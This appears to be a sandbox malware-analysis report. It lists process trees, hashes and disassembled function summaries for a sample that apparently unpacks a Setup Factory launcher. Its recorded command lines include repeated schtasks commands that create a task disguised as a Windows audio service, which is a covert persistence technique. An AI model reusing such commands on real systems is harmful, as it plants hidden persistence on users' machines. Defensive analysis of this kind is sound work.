Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	137
Start time:	22:27:15
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	138
Start time:	22:27:17
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: schtasks.exePID: 2792, Parent PID: 7588

General

Target ID:	139
Start time:	22:27:20
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	140
Start time:	22:27:22
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	141
Start time:	22:27:23
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: powershell.exePID: 4256, Parent PID: 3220

General

Target ID:	142
Start time:	22:27:24
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8168, Parent PID: 4256

General

Target ID:	143
Start time:	22:27:24
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	144
Start time:	22:27:28
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	145
Start time:	22:27:30
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	146
Start time:	22:27:33
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8188, Parent PID: 988

General

Target ID:	147
Start time:	22:27:33
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	148
Start time:	22:27:35
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: conhost.exePID: 7312, Parent PID: 7180

General

Target ID:	149
Start time:	22:27:40
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	150
Start time:	22:27:40
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7368, Parent PID: 7392

General

Target ID:	151
Start time:	22:27:40
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	152
Start time:	22:27:48
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5240, Parent PID: 6108

General

Target ID:	153
Start time:	22:27:48
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	154
Start time:	22:27:49
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	155
Start time:	22:27:56
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	156
Start time:	22:27:52
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	157
Start time:	22:27:53
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: powershell.exePID: 1472, Parent PID: 3220

General

Target ID:	158
Start time:	22:27:57
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7512, Parent PID: 1472

General

Target ID:	159
Start time:	22:27:57
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	160
Start time:	22:27:59
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: conhost.exePID: 6772, Parent PID: 3924

General

Target ID:	161
Start time:	22:28:10
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	162
Start time:	22:28:04
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	19.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	14.8%
Total number of Nodes:	284
Total number of Limit Nodes:	4

Executed Functions

Function 00007FF746501C88 Relevance: 70.2, APIs: 32, Strings: 8, Instructions: 224
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00007FF746501D31
lstrlenA.KERNEL32 ref: 00007FF746501D41
lstrcatA.KERNEL32 ref: 00007FF746501D58
lstrcatA.KERNEL32 ref: 00007FF746501D65
wsprintfA.USER32 ref: 00007FF746501D7D
lstrcatA.KERNEL32 ref: 00007FF746501D89
lstrcatA.KERNEL32 ref: 00007FF746501D96
wsprintfA.USER32 ref: 00007FF746501DAF
lstrcatA.KERNEL32 ref: 00007FF746501DBB
lstrcatA.KERNEL32 ref: 00007FF746501DC8
wsprintfA.USER32 ref: 00007FF746501DE0
lstrcatA.KERNEL32 ref: 00007FF746501DEC
lstrcatA.KERNEL32 ref: 00007FF746501DF9
GetCurrentProcess.KERNEL32 ref: 00007FF746501E04
OpenProcessToken.ADVAPI32 ref: 00007FF746501E17
malloc.LIBCMT ref: 00007FF746501E35
GetTokenInformation.KERNELBASE ref: 00007FF746501E61
wsprintfA.USER32 ref: 00007FF746501E99
lstrcatA.KERNEL32 ref: 00007FF746501EA5
lstrcatA.KERNEL32 ref: 00007FF746501EB2
LocalFree.KERNEL32 ref: 00007FF746501EBD
free.LIBCMT ref: 00007FF746501EC6
MessageBoxA.USER32 ref: 00007FF746501EE3
ShellExecuteExA.SHELL32 ref: 00007FF746501F3B
GetLastError.KERNEL32 ref: 00007FF746501F45
lstrcpyA.KERNEL32 ref: 00007FF746501F5D
MsgWaitForMultipleObjects.USER32 ref: 00007FF746501FD7
GetExitCodeProcess.KERNEL32 ref: 00007FF746501FED
CloseHandle.KERNEL32 ref: 00007FF746502018

Strings

"__IRAFN:%s", xrefs: 00007FF746501D72
"__IRTSS:%I64u", xrefs: 00007FF746501DD5
"__IRCT:%d", xrefs: 00007FF746501DA4
Could not start the setup, xrefs: 00007FF746501F56
"__IRSID:%s", xrefs: 00007FF746501E8E
__IRAOFF:%I64u, xrefs: 00007FF746501D0E
open, xrefs: 00007FF746501EFD
@, xrefs: 00007FF746501F19

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: lstrcat$wsprintf$Process$Token$CloseCodeCurrentErrorExecuteExitFreeHandleInformationLastLocalMessageMultipleObjectsOpenShellWaitfreelstrcpylstrlenmalloc
String ID: "__IRAFN:%s"$"__IRCT:%d"$"__IRSID:%s"$"__IRTSS:%I64u"$@$Could not start the setup$__IRAOFF:%I64u$open
API String ID: 1484400040-1136106755
Opcode ID: 9820ce7869afbd43234d8ddbaaf234af0137cb72b3d67a0ddeb776099a484ff7
Instruction ID: 646467a41bc7243a9665edce3e0dba6c8e8a8ef8ab358a75d72b97f8c59ff77a
Opcode Fuzzy Hash: 9820ce7869afbd43234d8ddbaaf234af0137cb72b3d67a0ddeb776099a484ff7
Instruction Fuzzy Hash: FEB14B32A1CA43D6EB14BF21EC54AAAF7A4FB44784F844035DA6E07A64EF3CD159C710

Function 00007FF7465019B4 Relevance: 63.2, APIs: 28, Strings: 8, Instructions: 153
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryA.KERNEL32 ref: 00007FF7465019F5
GetTempPathA.KERNEL32 ref: 00007FF746501A11
lstrlenA.KERNEL32 ref: 00007FF746501A1E
lstrcpyA.KERNEL32 ref: 00007FF746501A48
lstrlenA.KERNEL32 ref: 00007FF746501A58
lstrcatA.KERNEL32 ref: 00007FF746501A74
wsprintfA.USER32 ref: 00007FF746501AA2
wsprintfA.USER32 ref: 00007FF746501ABA
DeleteFileA.KERNELBASE ref: 00007FF746501AC7
RemoveDirectoryA.KERNELBASE ref: 00007FF746501AD1
GetFileAttributesA.KERNELBASE ref: 00007FF746501ADB
CreateDirectoryA.KERNELBASE ref: 00007FF746501AEC
lstrcpyA.KERNEL32 ref: 00007FF746501AFB
SetCurrentDirectoryA.KERNELBASE ref: 00007FF746501B06
lstrcpyA.KERNEL32 ref: 00007FF746501B1C
CreateDirectoryA.KERNEL32 ref: 00007FF746501B29
SetCurrentDirectoryA.KERNEL32 ref: 00007FF746501B34
lstrcpyA.KERNEL32 ref: 00007FF746501B49
lstrlenA.KERNEL32 ref: 00007FF746501B59
lstrcatA.KERNEL32 ref: 00007FF746501B75
lstrcpyA.KERNEL32 ref: 00007FF746501B87
lstrcpyA.KERNEL32 ref: 00007FF746501B99
lstrcatA.KERNEL32 ref: 00007FF746501BAD
lstrcpyA.KERNEL32 ref: 00007FF746501BBF
lstrcatA.KERNEL32 ref: 00007FF746501BD3
GetDiskFreeSpaceA.KERNELBASE ref: 00007FF746501C16

Part of subcall function 00007FF74650180C: lstrlenA.KERNEL32 ref: 00007FF746501840
Part of subcall function 00007FF74650180C: lstrcatA.KERNEL32 ref: 00007FF74650185A
Part of subcall function 00007FF74650180C: lstrlenA.KERNEL32 ref: 00007FF746501863
Part of subcall function 00007FF74650180C: SetCurrentDirectoryA.KERNEL32 ref: 00007FF7465018B6
Part of subcall function 00007FF74650180C: CreateDirectoryA.KERNEL32 ref: 00007FF7465018C7

lstrcpyA.KERNEL32 ref: 00007FF746501C45
SetCurrentDirectoryA.KERNELBASE ref: 00007FF746501C57

Strings

c:\temp, xrefs: 00007FF746501B10
_ir_sf_temp, xrefs: 00007FF746501A8B
%s\irsetup.exe, xrefs: 00007FF746501AAC
You must have at least 2MB of free space on your TEMP drive!, xrefs: 00007FF746501C3E
irsetup.exe, xrefs: 00007FF746501B9F
Could not determine a temp directory name. Try running setup.exe /T:<Path>, xrefs: 00007FF746501B42
lua5.1.dll, xrefs: 00007FF746501BC5
%s%s_%d, xrefs: 00007FF746501A97

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: Directory$lstrcpy$Currentlstrcatlstrlen$Create$Filewsprintf$AttributesDeleteDiskFreePathRemoveSpaceTemp
String ID: %s%s_%d$%s\irsetup.exe$Could not determine a temp directory name. Try running setup.exe /T:<Path>$You must have at least 2MB of free space on your TEMP drive!$_ir_sf_temp$c:\temp$irsetup.exe$lua5.1.dll
API String ID: 3816071345-4167539251
Opcode ID: 099cdf72516c0135f1b5aa9ac0640ce91bc81016b26d1f710b104e2d1a9d3ea1
Instruction ID: 7813bab37c9505c8519957907fc9e02563f41373a7cf8f532d41fc16d088e7bd
Opcode Fuzzy Hash: 099cdf72516c0135f1b5aa9ac0640ce91bc81016b26d1f710b104e2d1a9d3ea1
Instruction Fuzzy Hash: 4D81072261DA86E6EF10FF20EC946AAE321FB94758FC05032E66E42564EF7CE54DC750

Function 00007FF746504260 Relevance: 4.5, APIs: 3, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE ref: 00007FF746504276
GetVersion.KERNEL32 ref: 00007FF746504288
HeapSetInformation.KERNEL32 ref: 00007FF7465042A6

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: Heap$CreateInformationVersion
String ID:
API String ID: 3563531100-0
Opcode ID: c9ef4103069467bc3e1cbfb86f8ddfe3974583134bc7e4447d0960c5f6b28c4e
Instruction ID: eb89c5f3ca396b0850f35c061956a66ba3c0e2adf3a1345ddb6118b6af990ab6
Opcode Fuzzy Hash: c9ef4103069467bc3e1cbfb86f8ddfe3974583134bc7e4447d0960c5f6b28c4e
Instruction Fuzzy Hash: FEE03265A2DE43C2EB847B51EC19B76E260BF88380FC01035E91E42B94EF3CE0468A20

Function 00007FF7465012AC Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 167
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_lopen.KERNEL32 ref: 00007FF7465012D4
lstrcpyA.KERNEL32(?,00000000,?,00007FF746502066), ref: 00007FF7465012F2
malloc.LIBCMT ref: 00007FF746501305
lstrcpyA.KERNEL32(?,00000000,?,00007FF746502066), ref: 00007FF74650131D
free.LIBCMT ref: 00007FF74650155E

Strings

Unable to allocate memory buffer, xrefs: 00007FF746501316
Unable to open archive file, xrefs: 00007FF7465012EB
Could not find total size indicator, xrefs: 00007FF7465014E4
Could not find multi-segment indicator, xrefs: 00007FF746501436
Could not find compression type indicator, xrefs: 00007FF746501494
Could not find data segment, xrefs: 00007FF746501545
Could not find setup size, xrefs: 00007FF746501528

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: lstrcpy$_lopenfreemalloc
String ID: Could not find compression type indicator$Could not find data segment$Could not find multi-segment indicator$Could not find setup size$Could not find total size indicator$Unable to allocate memory buffer$Unable to open archive file
API String ID: 2570182538-3063878580
Opcode ID: 22b7bc175bc963bd6d53fc1d61e76a92a96c1392be0153a7998fae68218e539b
Instruction ID: 48674d5664030865f57bf41a41ad6abba12c5ef1590df959344e23eaa8245706
Opcode Fuzzy Hash: 22b7bc175bc963bd6d53fc1d61e76a92a96c1392be0153a7998fae68218e539b
Instruction Fuzzy Hash: 9B81E321A0CA82E6EB38BF64DC809AAE360FB457A4F944235D63B075D0EF3CE556C711

Function 00007FF746501694 Relevance: 33.3, APIs: 14, Strings: 5, Instructions: 88
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE ref: 00007FF7465016C0
_lread.KERNEL32(?,?,00000000,00007FF746502090), ref: 00007FF7465016D5
lstrcpyA.KERNEL32(?,?,00000000,00007FF746502090), ref: 00007FF7465016EB
malloc.LIBCMT ref: 00007FF746501705
SetFilePointer.KERNELBASE ref: 00007FF746501725
_lread.KERNEL32(?,?,00000000,00007FF746502090), ref: 00007FF746501739
_lcreat.KERNEL32 ref: 00007FF746501755
lstrcpyA.KERNEL32(?,?,00000000,00007FF746502090), ref: 00007FF74650176D
_lwrite.KERNEL32 ref: 00007FF746501782
lstrcpyA.KERNEL32 ref: 00007FF74650179C
_lclose.KERNEL32 ref: 00007FF7465017A9
lstrcpyA.KERNEL32 ref: 00007FF7465017C8
free.LIBCMT ref: 00007FF7465017D6
lstrcpyA.KERNEL32 ref: 00007FF7465017E8

Strings

Unable to open Lua DLL file, xrefs: 00007FF746501766
Unable to write to Lua file., xrefs: 00007FF746501795
Failed to read Lua DLL, xrefs: 00007FF7465017C1
Could not find Lua DLL file size, xrefs: 00007FF7465016E4
Failed to alloc memory., xrefs: 00007FF7465017E1

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: lstrcpy$FilePointer_lread$_lclose_lcreat_lwritefreemalloc
String ID: Could not find Lua DLL file size$Failed to alloc memory.$Failed to read Lua DLL$Unable to open Lua DLL file$Unable to write to Lua file.
API String ID: 1949781031-3124031069
Opcode ID: 7c37d052be7d746f3a813819f2a4a99933126608affe5d93bb435aa8b2150c04
Instruction ID: f0827894c8851606e56fc470ccc8be89c2564a5609a96224efb8645041c058f1
Opcode Fuzzy Hash: 7c37d052be7d746f3a813819f2a4a99933126608affe5d93bb435aa8b2150c04
Instruction Fuzzy Hash: 21412C35A1DA42D3EB24BB15EC9446AE361FB88794B844034DA2F476A4EF3CF599C720

Function 00007FF746501000 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 119
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadCursorA.USER32 ref: 00007FF746501046
SetCursor.USER32 ref: 00007FF74650104F
lstrlenA.KERNEL32 ref: 00007FF746501078
lstrcpyA.KERNEL32 ref: 00007FF74650108C
lstrcpyA.KERNEL32 ref: 00007FF7465010D3
lstrlenA.KERNEL32 ref: 00007FF7465010FF
lstrlenA.KERNEL32 ref: 00007FF74650111A
CompareStringA.KERNELBASE ref: 00007FF746501172
MessageBoxA.USER32 ref: 00007FF7465011CF

Strings

Launcher Error, xrefs: 00007FF7465011BB
/~DBG, xrefs: 00007FF746501153

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: lstrlen$Cursorlstrcpy$CompareLoadMessageString
String ID: /~DBG$Launcher Error
API String ID: 4294429971-151238577
Opcode ID: 0a9277867ff730e7b32f19f1c7990337ee8fc1156189be33327bbe5ebcf876f3
Instruction ID: 2ac471cbfab5af5dc8345ded49223a2422c20b16bc6c345bc5a21c17f5483cfb
Opcode Fuzzy Hash: 0a9277867ff730e7b32f19f1c7990337ee8fc1156189be33327bbe5ebcf876f3
